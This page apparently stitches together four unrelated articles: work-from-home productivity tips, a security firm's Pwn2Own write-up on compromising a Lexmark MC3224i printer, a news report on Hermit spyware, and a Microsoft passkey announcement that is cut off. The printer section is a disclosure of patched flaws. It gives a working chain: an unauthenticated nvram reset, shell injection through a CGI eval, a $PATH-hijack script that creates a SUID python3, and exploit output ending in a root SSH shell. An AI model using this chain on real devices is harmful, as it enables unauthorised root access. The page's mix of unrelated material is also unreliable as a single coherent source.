Category: Android

How to Work From Home: 24 Tips From People Who Do It Successfully

Working from home is awesome, right up until the cat throws up on your computer. And your neighbor, who you can only assume is building a time machine, starts firing up all sorts of power tools and noisy machinery across the street.

COVID-19 has caused remote work to become a necessity instead of a luxury for many professionals. But which environment allows us to be more productive: the home office or the office office?

In the office office, your colleagues often pose the greatest threat to keeping you from getting some real, heads-down work done. They drop by your desk, engage you in conversation, and invite you to lunch — or so I hear. The social benefits are nice to have, but they can become a challenge if you’re easily distracted.

However, at the home office, while family members can be a distraction, I find that it’s easy for you to become your own worst enemy. Because without coworkers around, you’re free to drop those pesky inhibitions. At the home office, no one’s watching. You don’t necessarily feel that same peer pressure or communal obligation to get stuff done. (Also, you don’t have to wear pants.)

Download Now: How to Be More Productive at Work [Free Guide + Templates]

Below, I’ve compiled many great work-at-home tips and tricks from some of my awesome coworkers.

Stop Managing Your Remote Workers As If They Work Onsite

How to Work From Home

  1. Communicate expectation with anyone who will be home with you.
  2. Take clear breaks.
  3. Interact with other humans.
  4. Prepare meals the night before.
  5. Pick a definitive finish time.
  6. Eat and sleep.
  7. Talk to your employer.
  8. Join a remote-friendly company.
  9. Start a career as a freelancer.
  10. Start a home business.

1. Communicate expectations with anyone who will be home with you.

Of course, you might be working from home but still have “company.” Make sure any roommates, family members, and dogs (well, maybe not dogs) respect your space during work hours. Just because you’re working from home doesn’t mean you’re home.

If you share space with another work-from-home adult, you may have to lay ground rules about meeting times, shared desks and chairs, and quiet times.

CEO Sam Mallikarjunan tells how he manages to get work done even when people are around.

“If anyone else is going to be at home when you’re working, they just have to be clear that when you’re in your ‘office’ (in my case, my signal to the family is having headphones on), you’re working — even if it looks like and feels like you’re hanging out at home.”

He continues, “It’s easy to get distracted by the many things that have to be done around the house during the day.”

2. Take clear breaks.

It can be so easy to get distracted as a telecommuter that you avoid breaks altogether. Don’t let the guilt of working in the building you sleep in prevent you from taking five minutes to relax.

However rather than just opening YouTube and watching some comfort clips, use your breaks to get away from your desk. Go for a walk, enjoy fresh air, or spend time with others who might also be in the house.

Take Ginny Mineo‘s advice. “Breaks, like making and eating lunch, can recharge you to do better work. Don’t assume you need to be working 100% of the time while you’re home to be more productive.”

3. Interact with other humans.

When your office starts working from home, you’ll likely miss the casual social interactions with colleagues you’re used to throughout the day. When working from home, you don’t have the small talk and other activities that make each day at the office unique.

So what can you do? Communicate.

Fight boredom and loneliness by frequent communication with other employees. Reach out to them through video chat via apps like Zoom and Slack, a hosted phone system,  or however else your company communicates.

Remember: You’re working from home, not the moon. Interacting with other people during the day is allowed, even if they’re not your colleagues. It’s a good idea to see another face during the day when most of your workday is solitary. So, use your breaks to interact with others.

“Go outside and find a human to interact with — ordering your coffee, running an errand, whatever. It keeps you sane.”

– Corey Wainwright

4. Prepare meals the night before.

When you’re in your own home, it can be tempting to spend time preparing a nice breakfast and lunch for yourself, chopping and cooking included. Don’t use precious minutes making your food the day of work — cook it the night before.

Preparing food ahead of time ensures you can use your meal times to eat and that you aren’t performing non-work tasks that spend energy better used at your desk.

Digital marketing strategist, Lindsay Kolowich, adds, “Cooking at home is time you wouldn’t have spent meal prepping if you’d been in the office that day, and I find the minutes can add up in the end. To mitigate that, I try to cook and prep my meals the night before, just like I would for a day at the office.

5. Pick a definitive finishing time.

You might be under the impression that working from home establishes more work-life balance, but be careful with that assumption.

Working from home can also feel like being at a casino — you can get so caught up in your activity, in a relaxing environment, that you lose complete track of time.

“If you work from home full-time (or regularly), it’s really easy to let your work life bleed into your personal life,” says Tyler Littwin.

He continues, “Maintaining a boundary is important for both halves of the equation.”

In lieu of coworkers, whose packing up and leaving the office reminds you to do the same, set an alarm at the end of the day to indicate your normal workday is coming to an end. You don’t have to stop at exactly that time, but knowing the workday is technically over can help you start the process of saving your work and calling it quits for the evening.

6. Eat and sleep.

What is the biggest perk to working from home? One of the biggest benefits for some people (me), is complete access to the kitchen.

As soon as I take a break, I automatically drift towards the kitchen for some snacks.

An unhealthy diet can affect productivity and drain energy. When I switched to a healthier diet, it made me function better and get the most from my routine.

So eat well when working from home.

It’s also vital that you keep to a proper sleep schedule. Save binge-watching your favorite shows for the weekend. With the right food to keep energy levels high and sound sleep to refresh your body and mind, you can make a success of working from home.

7. Talk to your employer.

If you like your current job and don’t want to change it, the obvious step is to find a way to pivot the position.

One of the tips for doing this is folding the possibility of going remote into your next promotion cycle. Talk to your boss often about your intention to pivot.

And, if you’re not sure your employer will agree to working completely remotely, talk about the option of working remotely one or two days a week. When you use the work from home tips we’ve provided above, and your boss sees how productive you are, they could allow you more days to work from home.

8. Join a remote-friendly company.

If your work can be done remotely, but your current boss or organization doesn’t allow you to work from home, you might need to get a new job.

When looking for a work-from-home job, you can use the same methods you used in finding your regular office job. This includes channels like job sites, local job ads, and social media platforms.

Job sites that list work from home ads include:

Some remote-friendly firms include:

Check out these firms to see whether you meet the requirements to start working remotely for them.

9. Start a career as a freelancer.

If your current job isn’t remote work-friendly, you can go remote by starting your own business as a freelancer or a consultant.

Depending on the nature of your current job, you may start your own freelance business while still being employed.

The benefit of starting your freelance business while still employed is that it reduces the financial strain experienced by any new business.

10. Start a home business.

Starting a home business is one way to enjoy remote work.

Unlike other fields, certifications and education are not usually prerequisites. Instead, researching, having a smart business plan, and choosing the right business is more essential to the success of your business.

You can find more work-from-home tips in the books listed in this best remote work books article.

Working From Home Tips

  1. Get started early.
  2. Pretend like you are going into the office.
  3. Structure your day like you would in the office.
  4. Choose a dedicated workspace
  5. Don’t stay at home.
  6. Make it harder to use social media.
  7. Commit to doing more.
  8. Work when you’re at your most productive.
  9. Save calls for the afternoon.
  10. Focus on one distraction.
  11. Plan out what you’ll be workign on ahead of time.
  12. Use technology to stay connected.
  13. Match your music to the task at hand.
  14. Use laundry as a work timer.

1. Get started early.

When working in an office, your morning commute can help you wake up and feel ready to work by the time you get to your desk. At home, however, the transition from your pillow to your computer can be much more jarring.

Believe it or not, one way to work from home productively is to dive into your to-do list as soon as you wake up. Simply getting a project started first thing in the morning can be the key to making progress on it gradually throughout the day. Otherwise, you’ll prolong breakfast and let the morning sluggishness wear away your motivation.

Lindsay Kolowich says, “When I work from home, I wake up, put on a pot of coffee, and start working immediately — much earlier than normal working hours. I only start making breakfast once I’ve hit a wall or need a break. I’m a morning person and find I can get a ton done in the early morning hours, so this works really well for me.”

2. Pretend like you are going into the office.

The mental association you make between work and an office can make you more productive, and there’s no reason that feeling should be lost when working remotely.

I know that you love working in your pajamas (I do, too), but the mere act of changing clothes to something more serious will give you a signal to get work done throughout the day.

When you dress up, you give your brain a reason for dressing up, and it can keep you pumped throughout your work hours.

So when working from home, do all the things you’d do to prepare for an office role: Set your alarm, make (or get) coffee, and wear nice clothes.

Internet browsers like Google Chrome even allow you to set up multiple accounts with different toolbars on the top — for example, a toolbar for home and a separate toolbar for work.

Take to heart the words of HubSpot graphic designer, Anna Faber-Hammond, who says, “Get fully ready for the day and pretend you’re actually going to work. Otherwise, you might find yourself back in bed.”

3. Structure your day like you would in the office.

When working from home, you’re your own personal manager and can choose your working hours.

However, without things like an in-person meeting schedule to break up your day, you can easily lose focus or burn out.

To stay on schedule, segment what you’ll do and when for the day. If you have an online calendar, create personal events and reminders that tell you when to shift gears and start on new tasks. Google Calendar makes this easy.

Structuring your day as you would in the office also saves you from work creep. With this structure in place, working from home will not cause your work to invade your personal life.

“Are mornings for writing while you’re in the office? Use the same schedule at home. This structure will help keep you focused and productive.” – Ginny Mineo

4. Choose a dedicated workspace.

Just because you’re not working at an office doesn’t mean you can’t, well, have an office. Rather than cooping yourself up in your room or on the couch in the living room — spaces associated with leisure time — dedicate a specific room or surface in your home to working remotely.

No matter the space or location, have an area of the home to work and stay committed to throughout the day. And, after choosing your dedicated workspace, make the most of it by making it quiet.

CEO, Sam Mallikarjunan says, “Have a place you go specifically to work. It could be a certain table, chair, local coffee shop — some place that’s consistently your ‘workspace.’ It helps you get into the right frame of mind.”

5. Don’t stay at home.

Is your home office just not getting it done for you? Take your work-from-home life a step further and get out of the house. Coffee shops, libraries, public lounges, and similar Wi-Fi-enabled spaces can help you simulate the energy of an office so you can stay productive even when you don’t sit in an official workplace.

Content marketer, Corey Wainwright, comments, “I get out of my home to work and go to an establishment with actual tables, chairs, and people. It helps simulate the work environment and removes the distractions I typically have at home, like the urge to finally clean my room, do laundry, or watch TV. “

6. Make it harder to use social media.

Social media is designed to make it easy for us to open and browse quickly. As remote workers, though, this convenience can be the detriment of our productivity.

To counteract your social networks’ ease of use during work hours, remove them from your browser shortcuts and log out of every account on your phone or computer.

You might even consider working primarily in a private (or, if you’re using Chrome, an “Incognito”) browser window. This ensures you stay signed out of all your accounts, and each web search doesn’t autocomplete the word you’re typing. It’s a guarantee that you won’t be tempted into taking too many social breaks during the day.

Also, many have found it helpful to shut off social media notifications during the hours they work from home.

Alec Biedrzycki, product marketer at AirTable, says, “I remove all social networks from my toolbar bookmarks… you can get sucked in without knowing it, so eliminating the gateway to those networks keeps me on track.”

7. Commit to doing more.

Projects always take longer than you initially think they will. For that reason, you’ll frequently get done less than you set out to do.

So, just as you’re encouraged to overestimate how much work hours you’ll spend doing one thing, you should also overestimate how many things you’ll do during the day.

Even if you come up short of your goal, you’ll still come out of that day with a solid list of tasks filed under ‘complete.’

“On days I’m working from home, I tend to slightly overcommit on what I’ll deliver that day. So even if I get the urge to go do something else, I know I’ve already committed a certain amount of work to my team.”- Corey Wainwright

8. Work when you’re at your most productive.

Nobody sprints through their work from morning to evening — your motivation will naturally ebb and flow throughout the day. However, when you’re working from home, it’s all the more important to know when those ebbs and flows will take place and plan your schedule around it.

To capitalize on your most productive periods, save your more challenging tasks for when you know you’ll be in the right headspace for them. Use slower points of the day to knock out the easier logistical tasks on your plate.

Verily Magazine calls these tasks “small acts of success,” and they can help build your momentum for the heavier projects that are waiting for you later on.

Product designer, Brittany Leaning, says about her routine, “For me, the most productive times of the day are usually early in the morning or late at night. I recognize this and try to plan my day accordingly. Also, music that pumps me up doesn’t hurt.”

The responsibility is on you to know when you are most productive and build your work schedule around the periods of maximum productivity.

9. Save calls for the afternoon.

Sometimes, I’m so tired in the morning, that I don’t even want to hear my voice — let alone talk to others with it.

You shouldn’t have to give yourself too much time to become productive in the morning, but you can give yourself some extra time before working directly with others.

If you’re struggling to develop a reasonable work schedule for yourself as a telecommuter, start with the solitary tasks in the morning.

Save your phone calls, meetings, Google hangouts meetings, video call, and other collaborative work for when you’ve officially “woken up.”

Senior Marketing Director, James Gilbert, advises that you “Take advantage of morning hours to crank through meaty projects without distractions, and save any calls or virtual meetings for the afternoon.”

10. Focus on one distraction.

There’s an expression out there that says, “if you want something done, ask a busy person.”

The bizarre but true rule of productivity is that the busier you are, the more you’ll do.

It’s like Newton’s law of inertia: If you’re in motion, you’ll stay in motion. If you’re at rest, you’ll stay at rest. And busy people are in fast-enough motion that they have the momentum to complete anything that comes across their desk.

Unfortunately, it’s hard to find things to help you reach that level of busyness when you’re at home — your motivation can just swing so easily. HubSpot’s principal marketing manager, Pam Vaughan, suggests focusing on something that maintains your rhythm (in her case, it’s her daughter).

She says, “When I work from home, my 20-month-old daughter is home with me, too. It seems counterintuitive, but because I have to manage taking care of her and keeping her happy and entertained while still getting my work done, the pressure helps to keep me focused. When she’s napping or entertaining herself, I go into super-productive work mode.

The ‘distraction’ of my daughter (I mean that in the most loving way possible) means I can’t possibly succumb to some of the other common distractions of home.”

11. Plan out what you’ll be working on ahead of time.

Spending time figuring out what you’ll do today can take away from actually doing those things. And, you’ll have planned your task list so recently that you can be tempted to change your schedule on the fly.

It’s important to let your agenda change if you need it to, but it’s equally important to commit to a schedule that outlines every assignment before you begin.

Try solidifying your schedule the day before, making it feel more official when you wake up the next day to get started on it.

“Plan out your week in advance to optimize for the environments you’ll be in.”- Niti Shah

12. Use technology to stay connected.

Working from home might make you feel cut off from the larger operation happening in your company.

Instant messaging and videoconferencing tools like Slack and Zoom can make it easy to check in with other remote employees and remind you how your work contributes to the big picture.

It’s also vital to invest in the right technology. For instance, a bad-performance router can take the steam right off your enthusiasm to work, so it’s better to invest in a high-performance router.

CMO and former HubSpot employee, Meghan Keaney Anderson, remarks, “At HubSpot, we use Slack to keep conversations going remotely, Trello to keep us organized around priorities, and Google Hangouts plus Webex to make remote meetings more productive. Getting the right stack of support tools to fit your work style makes a big difference.”

13. Match your music to the task at hand.

During the week, music is the soundtrack to your career (cheesy, but admit it, it’s true). And at work, the best playlists are diverse playlists — you can listen to music that matches the energy of the project you’re working on to boost your productivity.

Video game soundtracks are excellent at doing this. In the video game, the lyric-free music is designed to help you focus; it only makes sense that it would help you focus on your work.

Want some other genres to spice up your routine and make you feel focused? Take them from startup marketer, Ginny Mineo, who offers her work music preferences below.

“When I’m powering through my inbox, I need some intense and catchy rap/R&B (like Nicki Minaj or Miley Cyrus) blasting through my headphones, but when I’m writing, Tom Petty is the trick. Finding what music motivates and focuses me for different tasks (and then sticking to those playlists for those tasks) has completely changed my WFH productivity.”

14. Use laundry as a work timer.

You might have heard that listening to just two or three songs in the shower can help you save water. And it’s true; hearing a few of your favorite songs start and end, one after another, can remind you how long you’ve been in the bathroom and shorten your wash time.

Why bring this up? Because the same general principle can help you stay on task when working from home. But instead of three songs off your music playlist, run your laundry instead.

Doing your laundry is a built-in timer for your home. So, use the time to start and finish something from your to-do list before changing the load.

Committing to one assignment during the wash cycle and another during the dry process can train you to work smarter on tasks that you might technically have all day to tinker with. And when you know there’s a timer, it makes it hard for distractions to derail your work.

People ops manager, Emma Brudner, notes, “I also usually do laundry when I work from home, and I set mini-deadlines for myself corresponding to when I have to go downstairs to switch loads. If I’m working on an article, I tell myself I’ll get to a certain point before the wash cycle ends. Then I set another goal for the dryer.”

Staying Productive While Working From Home

While you might miss the officeworking full time from home can be good for you.

For one, you don’t have to worry about commuting every day and you can better care for your loved ones by being around more often.

The work from home tips that we have provided can help you make the most of your new routine. Try out a few and you might find that you’re just as productive working from home as you are in the office.

Take me to Projects

Source :
https://blog.hubspot.com/marketing/productivity-tips-working-from-home

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

ProductLexmark MC3224
Affected Firmware Versions
(without claim for completeness)		CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware VersionCXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVECVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root CausesAuthentication Bypass, Shell Command Injection, Insecure SUID Binary
ImpactUnauthenticated Remote Code Execution (RCE) as root
ResearchersHanno Heinrichs, Lukas Kupczyk
Lexmark Resourceshttps[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interfacedestpath and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

A week after it emerged that a sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android’s built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it’s also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware’s functionality to be extended or altered at will. It’s not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide “law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years.” More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

“Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable,” Richard Melick, director of threat reporting for Zimperium, said.

The targets have their phones infected with the spy tool via drive-by downloads as initial infection vectors, which, in turn, entails sending a unique link in an SMS message that, upon clicking, activates the attack chain.

It’s suspected that the actors worked in collaboration with the targets’ internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

“We believe this is the reason why most of the applications masqueraded as mobile carrier applications,” the researchers said. “When ISP involvement is not possible, applications are masqueraded as messaging applications.”

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.

Google

An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344CVE-2019-8605CVE-2020-3837CVE-2020-9907CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as WhatsApp databases, from the device.

“As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too,” Google Project Zero’s Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources, doing so which results in the rogue app, masquerading as smartphone brands like Samsung, requests for extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

“This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need,” the researchers noted. “Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs.”

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it’s tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What’s more, Google TAG raised concerns that vendors like RCS Lab are “stockpiling zero-day vulnerabilities in secret” and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, “raising the specter that their stockpiles can be released publicly without warning.”

“Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits,” TAG said.

“While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.”

Source :
https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html

Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Howdy folks, 

Happy World Password Day! Today, I’m super excited to share some great news with you: Together, with the FIDO Alliance and other major platforms, Microsoft has announced support for the expansion of a common passwordless standard created by the FIDO Alliance and the World Wide Web consortium. These multi-device FIDO credentials, sometimes referred to as passkeys, represent a monumental step toward a world without passwords. We also have some great updates coming to our passwordless solutions in Azure Active Directory (Azure AD) and Windows that will expand passwordless to more use cases. 

Passwords have never been less adequate for protecting our digital lives. As Vasu Jakkal reported earlier today, there are over 921 password attacks every second. Lots of attackers want your password and will keep trying to steal it from you. It’s better for everyone if we just cut off their supply. 

Replacing passwords with passkeys 

Passkeys are a safer, faster, easier replacement for your password. With passkeys, you can sign in to any supported website or application by simply verifying your face, fingerprint or using a device PIN. Passkeys are fast, phish-resistant, and will be supported across leading devices and platforms. Your biometric information never leaves the device and passkeys can even be synced across devices on the same platform – so you don’t need to enroll each device and you’re protected in case you upgrade or lose your device. You can use Windows Hello today to sign in to any site that supports passkeys, and in the near future, you’ll be able to sign in to your Microsoft account with a passkey from an Apple or Google device.  

We enthusiastically encourage website owners and app developers to join Microsoft, Apple, Google, and the FIDO Alliance to support passkeys and help realize our vision of a truly passwordless world.  

thumbnail image 1 of blog post titled Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Going passwordless 

We’re proud to have been one of the earliest supporters of the FIDO standards, including FIDO2 certification for Windows Hello. We’re thrilled to evolve the FIDO standards ecosystem to support passkeys and that passwordless authentication continues to gain momentum. 

Since we started introducing passwordless sign-in nearly 5 years ago, the number of people across Microsoft services signing in each month without using their password has reached more than 240 million. And in the last six months, over 330,000 people have taken the next step of removing the password from their Microsoft Account. After all, you’re completely safe from password-based attacks if you don’t have one. 

Today, we’re also announcing new capabilities that will make it easier for enterprises to go completely passwordless: 

Passwordless for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure 

Now that remote or hybrid work is the new norm, lots more people are using a remote or virtualized desktop to get their work done. And now, we’ve added passwordless support for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure. This is currently in preview with Windows 11 Insiders, and is on the way for Windows 10 as well.  

Windows Hello for Business Cloud Trust  

Windows Hello for Business Cloud Trust simplifies the deployment experience of Windows Hello for hybrid environments. This new deployment model removes previous requirements for public key infrastructure (PKI) and syncing public keys between Azure AD and on-premises domain controllers. This improvement eliminates delays between users provisioning Windows Hello for Business and being able to authenticate and makes it easier than ever to use Windows Hello for Business for accessing on-premises resources and applications. Cloud Trust is now available in preview for Windows 10 21H2 and Windows 11 21H2. 

Multiple passwordless accounts in Microsoft Authenticator 

